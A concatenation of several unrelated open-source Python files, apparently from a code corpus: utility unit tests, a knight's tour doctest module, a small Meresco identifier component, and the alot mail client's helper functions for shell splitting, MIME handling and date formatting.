([], 1),
# ({}, 'a'), # now raises a TypeError
]
expected = None
for data, n in vals:
self.assertEqual(expected, utils.nth(data, n))
def test_bad_nths(self):
vals = [
({}, 'a', TypeError),
]
for data, n, exc in vals:
self.assertRaises(exc, utils.nth, data, n)
def test_lu(self):
data = {
'a': {
'b': {
'c': [1, 2, 3]}}}
expected = [
('a', {'b': {'c': [1, 2, 3]}}),
('a.b', {'c': [1, 2, 3]}),
('a.b.c', [1, 2, 3])
]
self.assertAllPairsEqual(partial(utils.lu, data), expected)
def test_lu_with_default(self):
data = {'a': {'b': {'c': [1, 2, 3]}}}
expected_default = 'wtf?'
expected = [
('a.b.z', expected_default),
('a.y.z', expected_default),
('x.y.z', expected_default)
]
self.assertAllPairsEqual(partial(utils.lu, data, default=expected_default), expected)
def test_lu_no_default(self):
data = {'a': {'b': {'c': [1, 2, 3]}}}
self.assertRaises(ValueError, utils.lu, data, 'x.y.z')
def test_lu_no_context(self):
data = None
self.assertRaises(ValueError, utils.lu, data, 'a.b.c')
def test_lu_no_dict_context(self):
data = [1, 2, 3]
self.assertRaises(ValueError, utils.lu, data, 'a.b.c')
def test_lu_invalid_path(self):
data = {'a': {'b': {'c': [1, 2, 3]}}}
self.assertRaises(ValueError, utils.lu, data, None)
@patch('time.sleep')
def test_call_while_happy_path(self, sleep):
check = MagicMock()
check.side_effect = [True, True, False]
utils.call_while(check, interval=5)
self.assertEqual(2, len(sleep.mock_calls))
@patch('time.sleep')
def test_call_while_timeout(self, sleep):
check = MagicMock()
check.return_value = True
try:
utils.call_while(check, interval=5, timeout=15)
self.fail("Should not return normally")
except BaseException:
self.assertEqual(3, len(sleep.mock_calls))
@patch('time.sleep')
def test_call_while_timeout_inner_exception_message(self, sleep):
check = MagicMock()
check.return_value = RuntimeError("The answer is not 42")
try:
utils.call_while(check, interval=5, timeout=15)
self.fail("Should not return normally")
except BaseException as e:
self.assertIn("(The answer is not 42)", str(e))
@patch('time.sleep')
def test_call_while_custom_exception(self, sleep):
check = MagicMock()
check.return_value = True
try:
utils.call_while(check, interval=5, timeout=15, exception_class=OSError)
self.fail("Should not return normally")
except OSError as e:
self.assertEqual("Reached timeout 15 while waiting ...", str(e))
@patch('time.sleep')
def test_call_while_custom_message(self, sleep):
check = MagicMock()
check.return_value = True
try:
utils.call_while(check, interval=5, timeout=15, update_msg="waiting for Godot")
self.fail("Should not return normally")
except BaseException as e:
self.assertEqual("Reached timeout 15 while waiting for Godot", str(e))
def test_ensure(self):
utils.ensure(True, "True should allow ensure() to continue")
self.assertRaises(AssertionError, utils.ensure, False, "Error message")
class CustomException(Exception):
pass
self.assertRaises(CustomException, utils.ensure, False, "Error message", CustomException)
def test_nested_dictmap(self):
"nested_dictmap transforms a dictionary recursively as expected"
vals = {'foo': 'pants', 'bar': 'party'}
def func(v):
return v.format(**vals) if utils.isstr(v) else v
cases = [
# given, expected, fn
({'a': 'b'}, {'a': 'b'}, None), # no function, does nothing
({'a': 'b'}, {'a': 'b'}, lambda k, v: (k, v)), # returns inputs
({'a': 'b'}, {'a': 'b'}, lambda k, v: (LOG.debug(k + v), (k, v))[1]), # side effects
# keys as well as values are updated
({'a': {'b': {'{foo}': '{bar}'}}}, {'a': {'b': {'pants': 'party'}}}, lambda k, v: (func(k), func(v))),
]
for given, expected, fn in cases:
self.assertEqual(expected, utils.nested_dictmap(fn, given))
def test_nested_dictmap_2(self):
"nested_dictmap visits replacements too"
def fn(k, v):
if k == 'a':
return k, {'{foo}': v}
k = k.format(foo='bar')
return k, v
cases = [
({'a': 'b'}, {'a': {'bar': 'b'}}, fn),
]
for given, expected, func in cases:
self.assertEqual(expected, utils.nested_dictmap(func, given))

# repo: seecr/dc-erfgeo-enrich | path: digitalecollectie/erfgeo/unprefixidentifier.py | license: gpl-2.0
## begin license ##
#
# "Digitale Collectie ErfGeo Enrichment" is a service that attempts to automatically create
# geographical enrichments for records in "Digitale Collectie" (http://digitalecollectie.nl)
# by querying the ErfGeo search API (https://erfgeo.nl/search).
# "Digitale Collectie ErfGeo Enrichment" is developed for Stichting DEN (http://www.den.nl)
# and the Netherlands Institute for Sound and Vision (http://instituut.beeldengeluid.nl/)
# by Seecr (http://seecr.nl).
# The project is based on the open source project Meresco (http://meresco.org).
#
# Copyright (C) 2015 Netherlands Institute for Sound and Vision http://instituut.beeldengeluid.nl/
# Copyright (C) 2015 Seecr (Seek You Too B.V.) http://seecr.nl
# Copyright (C) 2015 Stichting DEN http://www.den.nl
#
# This file is part of "Digitale Collectie ErfGeo Enrichment"
#
# "Digitale Collectie ErfGeo Enrichment" is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# "Digitale Collectie ErfGeo Enrichment" is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with "Digitale Collectie ErfGeo Enrichment"; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
## end license ##
from meresco.core import Observable
class UnprefixIdentifier(Observable):
def __init__(self, prefix='oai:data.digitalecollectie.nl:', **kwargs):
Observable.__init__(self, **kwargs)
self._prefix = prefix
def all_unknown(self, message, identifier, **kwargs):
if identifier.startswith(self._prefix):
identifier = identifier[len(self._prefix):]
yield self.all.unknown(message, identifier=identifier, **kwargs)
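
# Illustrative behaviour: with the default prefix, a message for identifier
# 'oai:data.digitalecollectie.nl:some-record' is forwarded downstream with the
# identifier 'some-record' ('some-record' is only an example value); identifiers
# without the prefix pass through unchanged.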

# repo: erikosmond/knights_tour | path: knights_tour_tests_doc.py | license: mit
#import doctest
from knights_tour import Board, Position, ChessPiece, Knight, Tour
# I could potentially have one function that calls all the other functions, so I can create one board and just pass it into each test.
def get_weight_from_board(rows, columns, row, column):
"""
The first test expects to have None returned, thus the empty space
>>> get_weight_from_board(rows=0, columns=0, row=0, column=0)
This test would be None but should not happen as only positions that fit on a board should get a weight
>>> get_weight_from_board(rows=4, columns=4, row=5, column=3)
2
>>> get_weight_from_board(rows=8, columns=8, row=8, column=8)
2
>>> get_weight_from_board(rows=8, columns=8, row=8, column=1)
2
>>> get_weight_from_board(rows=8, columns=8, row=4, column=5)
8
>>> get_weight_from_board(rows=4, columns=4, row=2, column=1)
3
"""
board = Board(rows, columns, verbosity=0)
return board.get_weight(row, column)
def knight_moves(rows, columns, row1, column1, row2, column2):
"""
Tests to see if a second knight is created, it has the proper knight moves
>>> knight_moves(rows=8, columns=8, row1=4, column1=5, row2=5, column2=7)
True
"""
board = Board(rows, columns)
position1 = Position(row1, column1, board)
position2 = Position(row2, column2, board)
knight1 = Knight(position1)
knight2 = Knight(position2)
return knight1.moves == knight2.moves
def position_fits_on_board(rows, columns, row, column):
"""
>>> position_fits_on_board(rows = 8, columns = 8, row = 4, column = 5)
True
>>> position_fits_on_board(rows = 4, columns = 4, row = 5, column = 3)
False
>>> position_fits_on_board(rows = 8, columns = 8, row = 9, column = 8)
False
>>> position_fits_on_board(rows = 0, columns = 0, row = 9, column = 8)
False
>>> position_fits_on_board(rows = 8, columns = 8, row = 8, column = 8)
True
>>> position_fits_on_board(rows = 8, columns = 8, row = 1, column = 1)
True
"""
board = Board(rows, columns)
return Position(row, column, board).fits_on_board
def get_new_position(rows, columns, row, column, rdelta, cdelta):
"""
>>> get_new_position(rows=8, columns=8, row=8, column=8, rdelta=-1, cdelta=-2)
(7, 6)
>>> get_new_position(rows=8, columns=8, row=8, column=8, rdelta=1, cdelta=2)
(9, 10)
"""
board = Board(rows, columns)
position = Position(row, column, board)
new_position = position.get_new_position(rdelta, cdelta)
return (new_position.row, new_position.column)
def equal_position(rows, columns, row1, column1, row2, column2):
"""
ensure the position with the same coordinates will be considered equal
>>> equal_position(rows=8, columns=8, row1=8, column1=8, row2=8, column2=8)
True
>>> equal_position(rows=8, columns=8, row1=8, column1=11, row2=8, column2=11)
True
>>> equal_position(rows=8, columns=8, row1=8, column1=8, row2=8, column2=0)
False
>>> equal_position(rows=8, columns=8, row1=4, column1=8, row2=8, column2=4)
False
"""
board = Board(rows, columns)
position1 = Position(row1, column1, board)
position2 = Position(row2, column2, board)
return position1 == position2
def check_board(rows, columns, row, column):
"""
>>> check_board(rows = 8, columns = 8, row = 9, column = 8)
False
>>> check_board(rows = 8, columns = 8, row = 5, column = 5)
True
>>> check_board(rows = 8, columns = 8, row = 0, column = 5)
False
>>> check_board(rows = 8, columns = 8, row = 8, column = 8)
True
"""
board = Board(rows, columns)
position = Position(row, column, board)
return position._check_board()
def valid_pieces(rows=8, columns=8, row=9, column=8):
board = Board(rows, columns)
position = Position(row, column, board)
print position.fits_on_board
def valid_possible_position1(rows, columns, row1, column1, row2, column2):
"""
>>> valid_possible_position1(rows=8, columns=8, row1=4, column1=5, row2=5, column2=7)
False
"""
board = Board(rows, columns)
position1 = Position(row1, column1, board)
position2 = Position(row2, column2, board)
knight = Knight(position1)
knight.record_visited_position(position2)
return knight._valid_position(position1)
def valid_possible_position2(rows, columns, row1, column1, row2, column2):
"""
>>> valid_possible_position2(rows=8, columns=8, row1=4, column1=5, row2=5, column2=7)
False
"""
board = Board(rows, columns)
position1 = Position(row1, column1, board)
position2 = Position(row2, column2, board)
knight = Knight(position1)
knight.record_visited_position(position2)
return knight._valid_position(position2)
def valid_possible_position3(rows, columns, row1, column1, row2, column2):
"""
>>> valid_possible_position3(rows=8, columns=8, row1=4, column1=5, row2=5, column2=7)
True
>>> valid_possible_position3(rows=8, columns=8, row1=4, column1=5, row2=5, column2=11)
False
>>> valid_possible_position3(rows=8, columns=8, row1=9, column1=9, row2=5, column2=7)
True
"""
board = Board(rows, columns)
position1 = Position(row1, column1, board)
position2 = Position(row2, column2, board)
knight = Knight(position1)
return knight._valid_position(position2)
def get_possible_moves(rows, columns, row, column):
"""
>>> get_possible_moves(rows = 8, columns = 8, row = 8, column = 8)
[(7, 6), (6, 7)]
>>> get_possible_moves(rows = 8, columns = 8, row = 4, column = 5)
[(5, 7), (5, 3), (3, 7), (3, 3), (6, 6), (6, 4), (2, 6), (2, 4)]
"""
board = Board(rows, columns)
position = Position(row, column, board)
knight = Knight(position)
positions = []
for p in knight.get_possible_moves():
positions.append(p.coordinate)
return positions
def create_moves(rows, columns, row, column):
"""
Test creating all knight moves
>>> create_moves(rows = 8, columns = 8, row = 8, column = 8)
((1, 2), (1, -2), (-1, 2), (-1, -2), (2, 1), (2, -1), (-2, 1), (-2, -1))
"""
board = Board(rows, columns)
position = Position(row, column, board)
knight = Knight(position)
return knight.create_moves()
def record_visited_position(rows, columns, row1, column1, row2, column2):
"""
>>> record_visited_position(rows=8, columns=8, row1=4, column1=5, row2=5, column2=7)
[(4, 5), (5, 7)]
"""
board = Board(rows, columns)
position1 = Position(row1, column1, board)
position2 = Position(row2, column2, board)
knight = Knight(position1)
knight.record_visited_position(position2)
positions = []
for pos in knight.visited_positions:
positions.append(pos.coordinate)
return positions
def retrace_pop(rows, columns, row1, column1, row2, column2):
"""
>>> retrace_pop(rows=8, columns=8, row1=4, column1=5, row2=5, column2=7)
(4, 5)
"""
board = Board(rows, columns)
position1 = Position(row1, column1, board)
position2 = Position(row2, column2, board)
knight = Knight(position1)
knight.record_visited_position(position2)
return knight.retrace().coordinate
def retrace_visited(rows, columns, row1, column1, row2, column2):
"""
>>> retrace_visited(rows=8, columns=8, row1=4, column1=5, row2=5, column2=7)
(4, 5)
"""
board = Board(rows, columns)
position1 = Position(row1, column1, board)
position2 = Position(row2, column2, board)
knight = Knight(position1)
knight.record_visited_position(position2)
knight.retrace()
return knight.visited_positions[0].coordinate
def generate_start_position(rows, columns, position_coordinate):
"""
Test Tour._generate_start_position
>>> generate_start_position(rows=8, columns=8, position_coordinate="4.5")
(4, 5)
"""
tour = Tour(rows, columns, position_coordinate)
position = tour._generate_start_position(position_coordinate)
return position.coordinate
if __name__ == '__main__':
import doctest
#doctest will only return anything only if there is a failure
doctest.testmod()

# repo: fnurl/alot | path: alot/helper.py | license: gpl-3.0
# -*- coding: utf-8 -*-
# Copyright (C) 2011-2012 Patrick Totzke <[email protected]>
# Copyright © 2017 Dylan Baker
# This file is released under the GNU GPL, version 3 or a later revision.
# For further details see the COPYING file
from __future__ import absolute_import
from __future__ import division
from datetime import timedelta
from datetime import datetime
from collections import deque
from cStringIO import StringIO
import logging
import mimetypes
import os
import re
import shlex
import subprocess
import email
from email.generator import Generator
from email.mime.audio import MIMEAudio
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import urwid
import magic
from twisted.internet import reactor
from twisted.internet.protocol import ProcessProtocol
from twisted.internet.defer import Deferred
def split_commandline(s, comments=False, posix=True):
"""
splits semi-colon separated commandlines
"""
# shlex seems to remove unescaped quotes and backslashes
s = s.replace('\\', '\\\\')
s = s.replace('\'', '\\\'')
s = s.replace('\"', '\\\"')
# encode s to utf-8 for shlex
if isinstance(s, unicode):
s = s.encode('utf-8')
lex = shlex.shlex(s, posix=posix)
lex.whitespace_split = True
lex.whitespace = ';'
if not comments:
lex.commenters = ''
return list(lex)
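
# Illustrative example: a config value like 'bclose; bnext' is split on the
# semicolon into two command strings; quotes and backslashes are escaped above so
# they come through the shlex pass literally.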
def split_commandstring(cmdstring):
"""
split command string into a list of strings to pass on to subprocess.Popen
and the like. This simply calls shlex.split but works also with unicode
bytestrings.
"""
if isinstance(cmdstring, unicode):
cmdstring = cmdstring.encode('utf-8', errors='ignore')
return shlex.split(cmdstring)
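
# For example (illustrative): split_commandstring('gvim --nofork "my file.txt"')
# gives ['gvim', '--nofork', 'my file.txt'], mirroring shlex.split().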
def string_sanitize(string, tab_width=8):
r"""
strips, and replaces non-printable characters
:param tab_width: number of spaces to replace tabs with. Read from
`globals.tabwidth` setting if `None`
:type tab_width: int or `None`
>>> string_sanitize(' foo\rbar ', 8)
' foobar '
>>> string_sanitize('foo\tbar', 8)
'foo bar'
>>> string_sanitize('foo\t\tbar', 8)
'foo bar'
"""
string = string.replace('\r', '')
lines = list()
for line in string.split('\n'):
tab_count = line.count('\t')
if tab_count > 0:
line_length = 0
new_line = list()
for i, chunk in enumerate(line.split('\t')):
line_length += len(chunk)
new_line.append(chunk)
if i < tab_count:
next_tab_stop_in = tab_width - (line_length % tab_width)
new_line.append(' ' * next_tab_stop_in)
line_length += next_tab_stop_in
lines.append(''.join(new_line))
else:
lines.append(line)
return '\n'.join(lines)
def string_decode(string, enc='ascii'):
"""
safely decodes string to unicode bytestring, respecting `enc` as a hint.
"""
if enc is None:
enc = 'ascii'
try:
string = unicode(string, enc, errors='replace')
except LookupError: # malformed enc string
string = string.decode('ascii', errors='replace')
except TypeError: # already unicode
pass
return string
def shorten(string, maxlen):
"""shortens string if longer than maxlen, appending ellipsis"""
if 1 < maxlen < len(string):
string = string[:maxlen - 1] + u'\u2026'
return string[:maxlen]
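
# For instance (illustrative): shorten(u'hello world', 5) returns u'hell…' (four
# characters plus the ellipsis); strings no longer than maxlen are returned as-is.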
def shorten_author_string(authors_string, maxlength):
"""
Parse a list of authors concatenated as a text string (comma
separated) and smartly adjust them to maxlength.
1) If the complete list of sender names does not fit in maxlength, it
tries to shorten names by using only the first part of each.
2) If the list is still too long, hide authors according to the
following priority:
- First author is always shown (if too long is shorten with ellipsis)
- If possible, last author is also shown (if too long, uses ellipsis)
- If there are more than 2 authors in the thread, show the
maximum of them. More recent senders have higher priority.
- If it is finally necessary to hide any author, an ellipsis
between first and next authors is added.
"""
# I will create a list of authors by parsing author_string. I use
# deque to do popleft without performance penalties
authors = deque()
# If author list is too long, it uses only the first part of each
# name (gmail style)
short_names = len(authors_string) > maxlength
for au in authors_string.split(", "):
if short_names:
author_as_list = au.split()
if len(author_as_list) > 0:
authors.append(author_as_list[0])
else:
authors.append(au)
# Author chain will contain the list of author strings to be
# concatenated using commas for the final formatted author_string.
authors_chain = deque()
if len(authors) == 0:
return u''
# reserve space for first author
first_au = shorten(authors.popleft(), maxlength)
remaining_length = maxlength - len(first_au)
# Tries to add an ellipsis if no space to show more than 1 author
if authors and maxlength > 3 and remaining_length < 3:
first_au = shorten(first_au, maxlength - 3)
remaining_length += 3
# Tries to add as more authors as possible. It takes into account
# that if any author will be hidden, and ellipsis should be added
while authors and remaining_length >= 3:
au = authors.pop()
if len(au) > 1 and (remaining_length == 3 or (authors and
remaining_length < 7)):
authors_chain.appendleft(u'\u2026')
break
else:
if authors:
# 5= ellipsis + 2 x comma and space used as separators
au_string = shorten(au, remaining_length - 5)
else:
# 2 = comma and space used as separator
au_string = shorten(au, remaining_length - 2)
remaining_length -= len(au_string) + 2
authors_chain.appendleft(au_string)
# Add the first author to the list and concatenate list
authors_chain.appendleft(first_au)
authorsstring = ', '.join(authors_chain)
return authorsstring
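
# Illustrative behaviour (approximate, not an exact doctest): a long sender chain
# such as 'Alice Cooper, Bob Dylan, ..., Zoe Smith' collapses to something like
# 'Alice, …, Zoe' for small maxlength values, keeping the first and most recent
# senders and marking hidden ones with an ellipsis.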
def pretty_datetime(d):
"""
translates :class:`datetime` `d` to a "sup-style" human readable string.
>>> now = datetime.now()
>>> now.strftime('%c')
'Sat 31 Mar 2012 14:47:26 '
>>> pretty_datetime(now)
u'just now'
>>> pretty_datetime(now - timedelta(minutes=1))
u'1min ago'
>>> pretty_datetime(now - timedelta(hours=5))
u'5h ago'
>>> pretty_datetime(now - timedelta(hours=12))
u'02:54am'
>>> pretty_datetime(now - timedelta(days=1))
u'yest 02pm'
>>> pretty_datetime(now - timedelta(days=2))
u'Thu 02pm'
>>> pretty_datetime(now - timedelta(days=7))
u'Mar 24'
>>> pretty_datetime(now - timedelta(days=356))
u'Apr 2011'
"""
ampm = d.strftime('%p').lower()
if len(ampm):
hourfmt = '%I' + ampm
hourminfmt = '%I:%M' + ampm
else:
hourfmt = '%Hh'
hourminfmt = '%H:%M'
now = datetime.now()
today = now.date()
if d.date() == today or d > now - timedelta(hours=6):
delta = datetime.now() - d
if delta.seconds < 60:
string = 'just now'
elif delta.seconds < 3600:
string = '%dmin ago' % (delta.seconds // 60)
elif delta.seconds < 6 * 3600:
string = '%dh ago' % (delta.seconds // 3600)
else:
string = d.strftime(hourminfmt)
elif d.date() == today - timedelta(1):
string = d.strftime('yest ' + hourfmt)
elif d.date() > today - timedelta(7):
string = d.strftime('%a ' + hourfmt)
elif d.year != today.year:
string = d.strftime('%b %Y')
else:
string = d.strftime('%b %d')
return string_decode(string, 'UTF-8')
def call_cmd(cmdlist, stdin=None):
"""
get a shell commands output, error message and return value and immediately
return.
.. warning::
This returns with the first screen content for interactive commands.
:param cmdlist: shellcommand to call, already splitted into a list accepted
by :meth:`subprocess.Popen`
:type cmdlist: list of str
:param stdin: string to pipe to the process
:type stdin: str
:return: triple of stdout, stderr, return value of the shell command
:rtype: str, str, int
"""
try:
proc = subprocess.Popen(
cmdlist,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE if stdin is not None else None)
out, err = proc.communicate(stdin)
ret = proc.returncode
except OSError as e:
out = b''
err = e.strerror
ret = e.errno
out = string_decode(out, urwid.util.detected_encoding)
err = string_decode(err, urwid.util.detected_encoding)
return out, err, ret
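
# Typical usage (illustrative): out, err, code = call_cmd(['ls', '-l']) runs the
# command to completion and returns decoded stdout, stderr and the exit status.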
def call_cmd_async(cmdlist, stdin=None, env=None):
"""
    get a shell command's output, error message and return value as a deferred.
:type cmdlist: list of str
:param stdin: string to pipe to the process
:type stdin: str
:return: deferred that calls back with triple of stdout, stderr and
return value of the shell command
:rtype: `twisted.internet.defer.Deferred`
"""
class _EverythingGetter(ProcessProtocol):
def __init__(self, deferred):
self.deferred = deferred
self.outBuf = StringIO()
self.errBuf = StringIO()
self.outReceived = self.outBuf.write
self.errReceived = self.errBuf.write
def processEnded(self, status):
termenc = urwid.util.detected_encoding
out = string_decode(self.outBuf.getvalue(), termenc)
err = string_decode(self.errBuf.getvalue(), termenc)
if status.value.exitCode == 0:
self.deferred.callback(out)
else:
terminated_obj = status.value
terminated_obj.stderr = err
self.deferred.errback(terminated_obj)
d = Deferred()
environment = os.environ
if env is not None:
environment.update(env)
logging.debug('ENV = %s', environment)
logging.debug('CMD = %s', cmdlist)
proc = reactor.spawnProcess(_EverythingGetter(d), executable=cmdlist[0],
env=environment,
args=cmdlist)
if stdin:
logging.debug('writing to stdin')
proc.write(stdin)
proc.closeStdin()
return d
def guess_mimetype(blob):
"""
uses file magic to determine the mime-type of the given data blob.
:param blob: file content as read by file.read()
:type blob: data
:returns: mime-type, falls back to 'application/octet-stream'
:rtype: str
"""
mimetype = 'application/octet-stream'
# this is a bit of a hack to support different versions of python magic.
# Hopefully at some point this will no longer be necessary
#
# the version with open() is the bindings shipped with the file source from
# http://darwinsys.com/file/ - this is what is used by the python-magic
# package on Debian/Ubuntu. However, it is not available on pypi/via pip.
#
# the version with from_buffer() is available at
# https://github.com/ahupp/python-magic and directly installable via pip.
#
# for more detail see https://github.com/pazz/alot/pull/588
if hasattr(magic, 'open'):
m = magic.open(magic.MAGIC_MIME_TYPE)
m.load()
magictype = m.buffer(blob)
elif hasattr(magic, 'from_buffer'):
# cf. issue #841
        magictype = magic.from_buffer(blob, mime=True) or mimetype
else:
raise Exception('Unknown magic API')
# libmagic does not always return proper mimetype strings, cf. issue #459
if re.match(r'\w+\/\w+', magictype):
mimetype = magictype
return mimetype
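# Added usage sketch (not part of the original module): 'path' is a
# hypothetical file supplied by the caller; the blob is read the same way
# mimewrap() below reads attachment contents.
def _guess_mimetype_usage_sketch(path):
    with open(path, 'rb') as f:
        return guess_mimetype(f.read())  # e.g. 'image/png' for a PNG file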
def guess_encoding(blob):
"""
uses file magic to determine the encoding of the given data blob.
:param blob: file content as read by file.read()
:type blob: data
:returns: encoding
:rtype: str
"""
# this is a bit of a hack to support different versions of python magic.
# Hopefully at some point this will no longer be necessary
#
# the version with open() is the bindings shipped with the file source from
# http://darwinsys.com/file/ - this is what is used by the python-magic
    # package on Debian/Ubuntu. However, it is not available on pypi/via pip.
#
# the version with from_buffer() is available at
# https://github.com/ahupp/python-magic and directly installable via pip.
#
# for more detail see https://github.com/pazz/alot/pull/588
if hasattr(magic, 'open'):
m = magic.open(magic.MAGIC_MIME_ENCODING)
m.load()
return m.buffer(blob)
elif hasattr(magic, 'from_buffer'):
m = magic.Magic(mime_encoding=True)
return m.from_buffer(blob)
else:
raise Exception('Unknown magic API')
def libmagic_version_at_least(version):
"""
checks if the libmagic library installed is more recent than a given
version.
:param version: minimum version expected in the form XYY (i.e. 5.14 -> 514)
with XYY >= 513
"""
if hasattr(magic, 'open'):
magic_wrapper = magic._libraries['magic']
elif hasattr(magic, 'from_buffer'):
magic_wrapper = magic.libmagic
else:
raise Exception('Unknown magic API')
if not hasattr(magic_wrapper, 'magic_version'):
# The magic_version function has been introduced in libmagic 5.13,
# if it's not present, we can't guess right, so let's assume False
return False
return magic_wrapper.magic_version >= version
# TODO: make this work on blobs, not paths
def mimewrap(path, filename=None, ctype=None):
"""Take the contents of the given path and wrap them into an email MIME
part according to the content type. The content type is auto detected from
the actual file contents and the file name if it is not given.
:param path: the path to the file contents
:type path: str
:param filename: the file name to use in the generated MIME part
:type filename: str or None
:param ctype: the content type of the file contents in path
:type ctype: str or None
:returns: the message MIME part storing the data from path
:rtype: subclasses of email.mime.base.MIMEBase
"""
with open(path, 'rb') as f:
content = f.read()
if not ctype:
ctype = guess_mimetype(content)
# libmagic < 5.12 incorrectly detects excel/powerpoint files as
# 'application/msword' (see #179 and #186 in libmagic bugtracker)
# This is a workaround, based on file extension, useful as long
# as distributions still ship libmagic 5.11.
if (ctype == 'application/msword' and
not libmagic_version_at_least(513)):
mimetype, _ = mimetypes.guess_type(path)
if mimetype:
ctype = mimetype
maintype, subtype = ctype.split('/', 1)
if maintype == 'text':
part = MIMEText(content.decode(guess_encoding(content), 'replace'),
_subtype=subtype,
_charset='utf-8')
elif maintype == 'image':
part = MIMEImage(content, _subtype=subtype)
elif maintype == 'audio':
part = MIMEAudio(content, _subtype=subtype)
else:
part = MIMEBase(maintype, subtype)
part.set_payload(content)
# Encode the payload using Base64
email.encoders.encode_base64(part)
# Set the filename parameter
if not filename:
filename = os.path.basename(path)
part.add_header('Content-Disposition', 'attachment',
filename=filename)
return part
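# Added usage sketch (not part of the original module): wraps a hypothetical
# file into a MIME part and shows how the detected type and filename are
# exposed on the resulting object.
def _mimewrap_usage_sketch(path):
    part = mimewrap(path)
    return part.get_content_type(), part.get_filename()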
def shell_quote(text):
"""Escape the given text for passing it to the shell for interpretation.
The resulting string will be parsed into one "word" (in the sense used in
the shell documentation, see sh(1)) by the shell.
:param text: the text to quote
:type text: str
:returns: the quoted text
:rtype: str
"""
return "'%s'" % text.replace("'", """'"'"'""")
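# Added usage sketch (not part of the original module): embedded single
# quotes survive the quoting, so the shell parses the result back into the
# original single word.
def _shell_quote_usage_sketch():
    # shell_quote("it's") yields a quoted string that sh parses back to: it's
    return shell_quote("it's")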
def humanize_size(size):
"""Create a nice human readable representation of the given number
(understood as bytes) using the "KiB" and "MiB" suffixes to indicate
kibibytes and mebibytes. A kibibyte is defined as 1024 bytes (as opposed to
    a kilobyte which is 1000 bytes) and a mebibyte is 1024**2 bytes (as opposed
to a megabyte which is 1000**2 bytes).
:param size: the number to convert
:type size: int
:returns: the human readable representation of size
:rtype: str
"""
for factor, format_string in ((1, '%i'),
(1024, '%iKiB'),
(1024 * 1024, '%.1fMiB')):
if size / factor < 1024:
return format_string % (size / factor)
return format_string % (size / factor)
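# Added usage sketch (not part of the original module): a few representative
# conversions for byte counts chosen for illustration.
def _humanize_size_usage_sketch():
    # 500 -> '500', 2048 -> '2KiB', 3 * 1024 ** 2 -> '3.0MiB'
    return humanize_size(500), humanize_size(2048), humanize_size(3 * 1024 ** 2)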
def parse_mailcap_nametemplate(tmplate='%s'):
"""this returns a prefix and suffix to be used
in the tempfile module for a given mailcap nametemplate string"""
nt_list = tmplate.split('%s')
template_prefix = ''
template_suffix = ''
if len(nt_list) == 2:
template_suffix = nt_list[1]
template_prefix = nt_list[0]
else:
template_suffix = tmplate
return (template_prefix, template_suffix)
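# Added usage sketch (not part of the original module): a typical mailcap
# nametemplate is split into the prefix and suffix handed to the tempfile
# module.
def _parse_mailcap_nametemplate_usage_sketch():
    return parse_mailcap_nametemplate('alot.%s.txt')  # -> ('alot.', '.txt')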
def parse_mailto(mailto_str):
"""
Interpret mailto-string
:param mailto_str: the string to interpret. Must conform to :rfc:2368.
:type mailto_str: str
:return: the header fields and the body found in the mailto link as a tuple
of length two
:rtype: tuple(dict(str->list(str)), str)
"""
if mailto_str.startswith('mailto:'):
import urllib
to_str, parms_str = mailto_str[7:].partition('?')[::2]
headers = {}
body = u''
to = urllib.unquote(to_str)
if to:
headers['To'] = [to]
for s in parms_str.split('&'):
key, value = s.partition('=')[::2]
key = key.capitalize()
if key == 'Body':
body = urllib.unquote(value)
elif value:
headers[key] = [urllib.unquote(value)]
return (headers, body)
else:
return (None, None)
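# Added usage sketch (not part of the original module): the address and
# parameters below are made up for illustration.
def _parse_mailto_usage_sketch():
    headers, body = parse_mailto('mailto:[email protected]?Subject=hi%20there&body=see%20you')
    # headers == {'To': ['[email protected]'], 'Subject': ['hi there']}
    # body == 'see you'
    return headers, body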
def mailto_to_envelope(mailto_str):
"""
Interpret mailto-string into a :class:`alot.db.envelope.Envelope`
"""
from alot.db.envelope import Envelope
headers, body = parse_mailto(mailto_str)
return Envelope(bodytext=body, headers=headers)
def RFC3156_canonicalize(text):
"""
Canonicalizes plain text (MIME-encoded usually) according to RFC3156.
This function works as follows (in that order):
1. Convert all line endings to \\\\r\\\\n (DOS line endings).
2. Ensure the text ends with a newline (\\\\r\\\\n).
    3. Encode all occurrences of "From " at the beginning of a line
to "From=20" in order to prevent other mail programs to replace
this with "> From" (to avoid MBox conflicts) and thus invalidate
the signature.
:param text: text to canonicalize (already encoded as quoted-printable)
:rtype: str
"""
text = re.sub("\r?\n", "\r\n", text)
if not text.endswith("\r\n"):
text += "\r\n"
text = re.sub("^From ", "From=20", text, flags=re.MULTILINE)
return text
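# Added usage sketch (not part of the original module): line endings are
# normalized to CRLF and a leading "From " is escaped.
def _rfc3156_canonicalize_usage_sketch():
    # "From me\nhello\n" becomes "From=20me\r\nhello\r\n"
    return RFC3156_canonicalize("From me\nhello\n")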
def email_as_string(mail):
"""
Converts the given message to a string, without mangling "From" lines
(like as_string() does).
:param mail: email to convert to string
:rtype: str
"""
fp = StringIO()
g = Generator(fp, mangle_from_=False, maxheaderlen=78)
g.flatten(mail)
as_string = RFC3156_canonicalize(fp.getvalue())
if isinstance(mail, MIMEMultipart):
# Get the boundary for later
boundary = mail.get_boundary()
# Workaround for http://bugs.python.org/issue14983:
# Insert a newline before the outer mail boundary so that other mail
# clients can verify the signature when sending an email which contains
# attachments.
as_string = re.sub(r'--(\r\n)--' + boundary,
r'--\g<1>\g<1>--' + boundary,
as_string, flags=re.MULTILINE)
return as_string
| gpl-3.0 | 5,192,336,678,170,296,000 | 32.567742 | 79 | 0.617769 | false |
ArcherSys/ArcherSys | Lib/unittest/test/testmock/__init__.py | 1 | 1535 | <<<<<<< HEAD
import os
import sys
import unittest
here = os.path.dirname(__file__)
loader = unittest.defaultTestLoader
def load_tests(*args):
    suite = unittest.TestSuite()
    for fn in os.listdir(here):
        if fn.startswith("test") and fn.endswith(".py"):
            modname = "unittest.test.testmock." + fn[:-3]
            __import__(modname)
            module = sys.modules[modname]
            suite.addTest(loader.loadTestsFromModule(module))
    return suite
